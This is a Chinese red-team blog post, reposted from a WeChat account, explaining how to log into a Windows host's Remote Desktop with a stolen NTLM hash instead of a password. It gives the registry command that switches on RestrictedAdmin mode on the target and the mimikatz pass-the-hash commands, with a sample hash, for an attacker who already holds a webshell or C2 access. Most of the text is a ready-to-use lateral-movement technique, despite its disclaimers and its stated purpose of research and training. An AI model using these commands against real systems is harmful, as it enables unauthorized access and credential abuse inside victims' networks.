【攻防小词条02 | 内网渗透】非明文密码认证RDP服务

admin 2024年10月8日00:24:17评论16 views字数 1176阅读3分55秒阅读模式

免责声明

由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。所涉及工具来自网络,安全性自测。

技巧实景思考

在攻防项目中时常会遇到目标Windows主机系统版本为Windows 2012+ (或Windows 10),在这些高版本版本的安全机制下,认证机制的Lsass进程缓存中默认是不再进行存储明文密码,如果想取消该机制需要修改注册表参数并重新登录用户将明文密码写入到缓存中,否则只能提取用户密码哈希(NTLM-Hash)。但也正因为这一安全机制的存在,部分系统内置的服务可以直接用NTLM-Hash进行认证利用,如:RDP、WMI、WinRM等,不一定需要明文才能展开扩展测试。

在攻防演练中,攻击队已获得命令执行权限(Webshell、C2远控),想登录上指定用户的RDP进行获取更多成果细节,但由于高系统版本明文缓存限制与强口令哈希无法破解的情况,则可以通过PTH(Pass The Hash,传递Hash)这一方式进行认证RDP服务,这时候就不需要明文密码即可登入该用户的远程桌面进一步利用。

【攻防小词条02 | 内网渗透】非明文密码认证RDP服务

技巧细节

PTH-RDP前提条件:启用RestrictedAdmin mode(受限管理模式)

注意:服务端与客户端都要启用受限管理模式才能正常利用PTH。受限管理模式是微软为了提高系统安全性,使明文凭据(明文密码)不会暴露在目标系统网络传输过程中,防止明文被嗅探抓取。简单理解就是启用RDP中可以使用NTLM Hash或Kerberos票据进行认证。

通过修改目标主机的注册表进行启用该模式:
启用该模式:REG ADD "HKLMSystemCurrentControlSetControlLsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f 
查询其结果:REG query "HKLMSystemCurrentControlSetControlLsa" | findstr "DisableRestrictedAdmin"

修改成果后,在本机上用mimikatz进行PTH认证RDP操作:

/user:PTH认证所使用的目标用户。

/domain:进行目标用户所处域,默认为工作组WORKGROUP。

/ntlm:目标用户NTLM-Hash。

privilege::debug 
sekurlsa::pth /user:administrator /domain:WORKGROUP /ntlm:2933b53c26145546db391c629d7902bb "/run:mstsc.exe /restrictedadmin"
执行命令后将会成功弹出mstsc程序框,填写上要连接的目标IP与对应RDP端口即可。

【攻防小词条02 | 内网渗透】非明文密码认证RDP服务

原文始发于微信公众号(划水但不摆烂):【攻防小词条02 | 内网渗透】非明文密码认证RDP服务

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月8日00:24:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【攻防小词条02 | 内网渗透】非明文密码认证RDP服务http://cn-sec.com/archives/1951354.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息